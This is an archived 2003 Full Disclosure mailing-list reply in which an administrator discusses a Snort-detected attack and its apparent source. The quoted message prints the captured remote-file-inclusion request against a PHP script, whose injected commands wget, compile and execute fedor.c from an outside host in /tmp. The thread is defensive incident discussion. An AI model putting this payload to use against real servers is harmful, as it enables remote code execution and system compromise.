Full Disclosure mailing list archives
Re: http://xfteam.net/fedor.c - Anyone seen this before??
From: Dan <dan () lockedbox net>
Date: Mon, 24 Nov 2003 10:15:42 +0000
I realised my foobar, just after I had posted. (DNS is resolving, I didnt try www. first) A tty capable daemon. Interesting.. Surly "they" realise that apache runs as a separate user on most systems(who runs it root?) It was the only hit from that netblock so I guess that it was a scan. And from looking at the google.jpg and the strings.txt i was lead to: http://www.arplhmd.cjb.net/ Looks like he makes some scripts/tools, noting a google tool which could account for the attempt on a dead link. Regards, Daniel. Dan <dan () lockedbox net> wrote:
Hi, Our Snort picked up an interesting attempt to download, compile and execute. Noting also the fact that the sub dir its attempting to access has not been there for over 4 months(/logjam/)? Has anyone actually seen what this fedor.c is? I have done some google'ing
but
it comes up blank. Has anyone else noticed this kindof request recently? Is it just me or is xfteam.net not resolving anyway? Orignal HTTP request: GET /logjam/showhits.php?
rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f
Breaking this down we get(twice): uname -a cd /tmp wget http://xfteam.net/fedor.c gcc -o f fedor.c ./f Regards, Daniel. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- http://xfteam.net/fedor.c - Anyone seen this before?? Dan (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? Robert Jaroszuk (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? gml (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? kang () insecure ws (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? kang () insecure ws (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? Dan (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? kang () insecure ws (Nov 24)
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? gml (Nov 24)
- <Possible follow-ups>
- Re: http://xfteam.net/fedor.c - Anyone seen this before?? root (Nov 24)